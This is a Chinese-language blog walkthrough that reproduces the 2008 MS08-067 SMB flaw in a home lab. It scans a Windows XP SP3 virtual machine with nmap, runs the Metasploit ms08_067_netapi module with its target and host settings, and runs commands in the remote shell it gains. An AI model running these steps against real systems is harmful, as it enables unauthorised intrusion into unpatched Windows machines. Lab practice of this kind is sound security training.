Featured image of post 【漏洞】windows漏洞MS08-067复现与攻击

【漏洞】windows漏洞MS08-067复现与攻击

准备工作

环境:

攻击机(192.168.15.128):Kali GNU/Linux Rolling x86_64

靶机(192.168.15.129): Windows XP Professional with Service Pack 3 (x86)

本次攻击测试靶机镜像来自MSDN, 我告诉你,特别鸣谢!

由于该漏洞已于2008年末被巨硬以发布补丁包的方式修复,所以有些较新的或者整合的镜像无法复现此漏洞,本人盆友亲测,故在此给出本人所用镜像,有需要可以到上面的网站下载:

1
2
3
4
zh-hans_windows_xp_professional_with_service_pack_3_x86_cd_x14-80404.iso
SHA1: 69DBF131116760932DCF132ADE111D6B45778098
文件大小: 601.04MB
发布时间: 2008-05-01

开始

配置好XP系统,win+R输入cmd,在命令窗口执行查询ip命令:

1
ipconfig

ipconfig

可知靶机ip为:192.168.15.129

在我们的kali里依法炮制,查询ip:

1
ifconfig

ifconfig

可知攻击机ip为:192.168.15.128

两台机器在同一网段,方便我们进行后续操作。

攻击

请出nmap,对靶机进行扫描:

1
nmap -sV -Pn 192.168.15.129  

解释下命令的参数:

-sV 表示启用版本检测。-sV 使得 nmap 在扫描时不仅会检查开放的端口,还会尝试确定运行在这些端口上的服务的版本信息。例如,如果某个端口上运行的是 HTTP 服务,nmap 会尝试识别是 Apache、Nginx 还是其他 Web 服务,并尝试获取它们的版本号。

-Pn 该选项告诉 nmap 不进行主机发现(Host Discovery)。通常,nmap 在扫描前会先进行主机发现,以确定目标主机是否在线(通过发送 ICMP 请求或 SYN 包等方式)。-Pn 选项告诉 nmap 跳过这一步,直接假设目标主机是在线的并进行扫描。

扫描得到:

nmap

可以看到靶机开放了三个端口,其中就有我们今天要利用的445端口。

直接启动msf进行漏洞利用:

1
msfconsole  

因为我们已经知道了这个漏洞叫MS08-067,所以直接搜索:

1
msf6> search ms08-067

msf-search

可以看到它找到了一个结果,来使用它:

1
msf6> use exploit/windows/smb/ms08_067_netapi

或:

1
msf6> use 0

然后我们来选择靶机版本target,本人的msf在使用search后会自动列出所有target,但是盆友亲测不会,所以使用命令来列出所有target

1
msf6> show target

这里一定要注意选择你自己的靶机版本,比如盆友使用的是简体中文版的winxp sp3,选用繁中版本xp或者是server的都会无法连接:

1
The connection was refused by the remote host (192.168.91.131:445).

默认target为第一个(0),使用set TARGET 序号/名称来设定target

1
msf6> set TARGET 'Windows XP SP3 Chinese - Simplified(NX)'

效果图在最后面的图片。

不建议复制我的,因为不同环境它的序号和名字也会变,比如我的简中XP序号是35,朋友的是10。

different

如果设定了错误的target并且已经执行了的话,需要重启靶机,不然会无法连接到靶机的445端口。

配置好target后,继续使用set来配置剩下需要配置的参数,查看所需参数:

1
msf6> show options

options

配置RHOSTSRPORT:

1
2
msf6> set RHOSTS 192.168.15.129
msf6> set RPORT 445

这里遇到很神奇的事,可能是我俩版本不一样,我可以使用RHOST代替RHOSTS,但是朋友这样输就会报错,以及可能msf不会给你自动配置RPORTLHOST,具体需要参考上面的options是否已有值。

一切准备好后,开始攻击!

输入run:

1
msf6> exploit(windows/smb/ms08_067_netapi) > run

set

成功拿到shell!

来测试一下:

1
2
3
4
5
cd ..
mkdir Ciallo
cd Ciallo
edit hacknya.txt
sysinfo

test

完美!

Licensed under CC BY-NC-SA 4.0